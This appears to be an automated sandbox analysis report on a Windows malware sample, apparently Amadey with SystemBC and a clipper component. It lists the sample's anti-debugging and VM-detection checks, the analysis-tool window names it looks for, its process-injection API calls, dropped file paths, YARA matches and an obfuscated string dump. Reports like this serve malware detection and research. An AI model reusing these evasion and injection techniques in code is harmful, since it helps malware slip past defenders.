Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940A91 second address: 4940B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C00886h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [75AF4C30h] 0x0000000e pushad 0x0000000f mov dx, ax 0x00000012 pushfd 0x00000013 jmp 00007FDA80C0087Ah 0x00000018 adc ax, 3EF8h 0x0000001d jmp 00007FDA80C0087Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov edx, dword ptr [ebx] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007FDA80C0087Bh 0x0000002f add si, 42BEh 0x00000034 jmp 00007FDA80C00889h 0x00000039 popfd 0x0000003a pushfd 0x0000003b jmp 00007FDA80C00880h 0x00000040 and cl, FFFFFFB8h 0x00000043 jmp 00007FDA80C0087Bh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940B22 second address: 4940B28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940B28 second address: 4940B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 4940B2C second address: 4940B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [eax], 00000002h 0x0000000b jmp 00007FDA80C026C7h 0x00000010 jne 00007FDAF1D5D62Ah 0x00000016 jmp 00007FDA80C026C6h 0x0000001b pop ebx 0x0000001c pushad 0x0000001d mov cl, 1Bh 0x0000001f mov ax, bx 0x00000022 popad 0x00000023 mov eax, edi 0x00000025 jmp 00007FDA80C026C5h 0x0000002a pop edi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FDA80C026BDh 0x00000032 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Special instruction interceptor: First address: 40BD57 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Special instruction interceptor: First address: 5E15B7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Special instruction interceptor: First address: 5C8CAC instructions caused by: Self-modifying code
Source: C:\ProgramData\rcjuo\eafkou.exe	Special instruction interceptor: First address: 40BD57 instructions caused by: Self-modifying code
Source: C:\ProgramData\rcjuo\eafkou.exe	Special instruction interceptor: First address: 5E15B7 instructions caused by: Self-modifying code
Source: C:\ProgramData\rcjuo\eafkou.exe	Special instruction interceptor: First address: 5C8CAC instructions caused by: Self-modifying code

Source: C:\ProgramData\rcjuo\eafkou.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe

Code function: 4_2_04940C1E rdtsc

4_2_04940C1E

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 180000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Window / User API: threadDelayed 1628	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Window / User API: threadDelayed 7987	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window / User API: threadDelayed 973	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window / User API: threadDelayed 1183	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window / User API: threadDelayed 888	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Window / User API: threadDelayed 1418	Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	API coverage: 4.2 %
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	API coverage: 1.9 %

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556	Thread sleep count: 1628 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556	Thread sleep time: -48840000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 320	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 4612	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556	Thread sleep count: 7987 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe TID: 6556	Thread sleep time: -239610000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe TID: 1472	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 6084	Thread sleep time: -134067s >= -30000s	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 6524	Thread sleep time: -1946973s >= -30000s	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 4676	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 5756	Thread sleep time: -2367183s >= -30000s	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 572	Thread sleep time: -1776888s >= -30000s	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe TID: 6608	Thread sleep time: -2837418s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000AF011 FindFirstFileExW,	0_2_000AF011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_0090F011 FindFirstFileExW,	1_2_0090F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_0090F011 FindFirstFileExW,	2_2_0090F011

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_000793D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_000793D0

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Thread delayed: delay time: 60000	Jump to behavior

Source: rundrive.exe, rundrive.exe, 00000004.00000002.2276703263.0000000000596000.00000040.00000001.01000000.0000000A.sdmp, eafkou.exe, eafkou.exe, 00000005.00000002.4538598446.0000000000596000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: XO4ioEY3nq.exe, 00000000.00000003.2077078897.0000000001434000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001424000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: Gxtuum.exe, 00000001.00000002.4538930866.0000000001446000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: eafkou.exe, 00000005.00000002.4539439463.00000000008B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: rundrive.exe, 00000004.00000002.2276703263.0000000000596000.00000040.00000001.01000000.0000000A.sdmp, eafkou.exe, 00000005.00000002.4538598446.0000000000596000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Thread information set: HideFromDebugger			Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Code function: 4_2_04940148 Start: 049401C9 End: 049401CF		4_2_04940148
Source: C:\ProgramData\rcjuo\eafkou.exe	Code function: 5_2_04950152 Start: 04950469 End: 049501C3		5_2_04950152

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: regmonclass
Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: gbdyllo
Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: procmon_window_class
Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: ollydbg
Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: filemonclass
Source: C:\ProgramData\rcjuo\eafkou.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\ProgramData\rcjuo\eafkou.exe	File opened: NTICE
Source: C:\ProgramData\rcjuo\eafkou.exe	File opened: SICE
Source: C:\ProgramData\rcjuo\eafkou.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\rcjuo\eafkou.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe

Code function: 4_2_04940C1E rdtsc

4_2_04940C1E

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_0009A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0009A245

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_000A6092 mov eax, dword ptr fs:[00000030h]	0_2_000A6092
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009DC00 mov eax, dword ptr fs:[00000030h]	0_2_0009DC00
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_00906092 mov eax, dword ptr fs:[00000030h]	1_2_00906092
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008FDC00 mov eax, dword ptr fs:[00000030h]	1_2_008FDC00
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_00906092 mov eax, dword ptr fs:[00000030h]	2_2_00906092
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008FDC00 mov eax, dword ptr fs:[00000030h]	2_2_008FDC00

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_000B0592 GetProcessHeap,

0_2_000B0592

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009A245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0009A245
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009A3A8 SetUnhandledExceptionFilter,	0_2_0009A3A8
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009EC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0009EC0D
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: 0_2_0009995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0009995A
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008FA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_008FA245
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008FA3A8 SetUnhandledExceptionFilter,	1_2_008FA3A8
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008FEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_008FEC0D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 1_2_008F995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_008F995A
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008FA245 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_008FA245
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008FA3A8 SetUnhandledExceptionFilter,	2_2_008FA3A8
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008FEC0D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_008FEC0D
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: 2_2_008F995A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_008F995A

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_00078070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

0_2_00078070

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Process created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Process created: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe "C:\Users\user\AppData\Roaming\10000550100\rundrive.exe"			Jump to behavior

Source: rundrive.exe, rundrive.exe, 00000004.00000002.2276703263.0000000000596000.00000040.00000001.01000000.0000000A.sdmp, eafkou.exe, eafkou.exe, 00000005.00000002.4538598446.0000000000596000.00000040.00000001.01000000.0000000B.sdmp

Binary or memory string: yProgram Manager

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_0009A42F cpuid

0_2_0009A42F

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: EnumSystemLocalesW,	0_2_000B2168
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: EnumSystemLocalesW,	0_2_000B21B3
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: EnumSystemLocalesW,	0_2_000B224E
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: EnumSystemLocalesW,	0_2_000A825C
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_000B22D9
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: GetLocaleInfoW,	0_2_000B252C
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_000B2652
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: GetLocaleInfoW,	0_2_000B2758
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: GetLocaleInfoW,	0_2_000A877E
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_000B2827
Source: C:\Users\user\Desktop\XO4ioEY3nq.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_000B1EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_009120C1
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_009121B3
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_00912168
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	1_2_009122D9
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_0090825C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	1_2_0091224E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_0091252C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_00912652
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_00912758
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	1_2_0090877E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_00912827
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_00911EC6
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_009121B3
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_00912168
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_009122D9
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_0090825C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: EnumSystemLocalesW,	2_2_0091224E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_0091252C
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00912652
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_00912758
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetLocaleInfoW,	2_2_0090877E
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00912827
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00911EC6

Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe	Queries volume information: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_0009A655 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_0009A655

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

0_2_000761F0

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_000AE72E _free,_free,_free,GetTimeZoneInformation,_free,

0_2_000AE72E

Source: C:\Users\user\Desktop\XO4ioEY3nq.exe

Code function: 0_2_000793D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_000793D0

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: XO4ioEY3nq.exe, type: SAMPLE
Source: Yara match	File source: 8.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.XO4ioEY3nq.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.XO4ioEY3nq.exe.70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Gxtuum.exe.8d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe, type: DROPPED

Yara detected SystemBC

Source: Yara match	File source: 00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2299942601.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundrive.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eafkou.exe PID: 6520, type: MEMORYSTR

Remote Access Functionality

Yara detected SystemBC

Source: Yara match	File source: 00000004.00000003.2269997123.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.2299942601.0000000004794000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundrive.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eafkou.exe PID: 6520, type: MEMORYSTR

Contains functionality to start a terminal service

Source: XO4ioEY3nq.exe	String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe, 00000000.00000000.2072086835.00000000000C1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: XO4ioEY3nq.exe, 00000000.00000000.2072086835.00000000000C1000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set00fadbeacf092dfd58b48ef4ac68f826bf11e9eb444cca0553e5dc41fdf05974a4d2cd276e9105dd9f50a97adeca06ba6b6af3NRdie3By02Gn35 46TWlV1irdIQ03UAo2n je34=AoSv2n8zcrNxQWOv5jto80 dZZbrhD9rUj/v7/Ht9j e2pCqTT6fW0yjbIUrikIi2v0nd4hyNs736j==CH9yPR==Jn5leIYtyH6sgR==AH0sgR==NIZ4QEY2PEJZQD==GSm0gYZtNrK2QT==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQrYZWeOF==JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcYYRlenqR2J0v6zCz96CdZZEwJSWhfoV1eF==Jb0tNR6kLDcDKKyLIHqVCz sI7J JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6UpQr2c0u2HBsOExeJwOv24Nhd2B=JPdGYGhBWpKaKZqm7j s964TXH9mgjIq3SScT4ZyerKs5I4o7kOi96 6RZctgD0tOMOcX3lldLleIpdvTDWr A==yK0TUWNQWpYEJXCIDN==MtKwfB==JtdTYB==GP0U0LV63cR62RV61SR6Nbp6NMN62vR63L96Ov56NM361w361Rh6295=NSOl2D9kdLm6P5Cs7z6d9KC1NSOl2D9kdLl=NRCpfD9kdLl=OsJ=OIJ=OIN=OIR=ILKpeh==0wW0fEsvNB==0wW0fIQ6NDX=OMmlOvCsNR6k2wRx1MSp4bqwASK1dXZ0EvR+EvV+AQGsgXhpdsBtznxrxl==5p==yc0udYU9EF==2RmleHAzOnUi3JB=0R0yenZsOExsQJCvGR00WnJ0c2OjL6qC8DWmP0 fby==JwOv24NhdZGf5JKfFK4BX2UgW7Yk5Kik7jV=FM4pfnI=HRKzfHZye7i3zHCkSd==GKSFYB==JvKu2HIgW7Kh50Os8El=GvdjgHcyKK3jPj==FK4HBo3wYHc001mRQZS47jmTbU==Fbq02HZm11UiQ0N=IbdygHcuJRdwdHczFRdte3VvKRquUHZm11UiQ0N=BsJyPAU1Po22FT==2bN=3RN=FRdugHZufHQS60GoIfCma0CTaZwehkHqObdyeT5k02GfFBGl60WnWKKreVVqQPRoAH5tOT4tsFuDe39011UYCXWs70Co 6qTaY4rTfsh1SOtOXVhfLt5zJ k6TV2FqWadIzfTvsh0LClenJt1YPgx65KT3cufLKs5F6X9UCeLmGacJwpfTEc3vqvejcv08Gj5F6C8EKeV05GCiVHsFttOT4tNXP=AH5NFh==ESSjfk4xAbuw2x==FRdugHZufHQS60GoIfCa LGlaYIeiDcq18d4OYh3fDQk36OwFUWr9K0nY44h4TH=JQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maH5dw7EWTW1OHYYWi2BEq1MG1gHZyVrurQT==FRdtfIZ012yMPZ6oNLOj2HZm177n2pyv6T6o LKrc5MYik5Z4MtwPUMzPIJ0ECl8FS9=AM0udXRv1LJrJQqTYFZNZJCZ4qOo6kSw96 Tco4pZZMVMtSveoVyd7maMZ s8DWdSqqdZY4 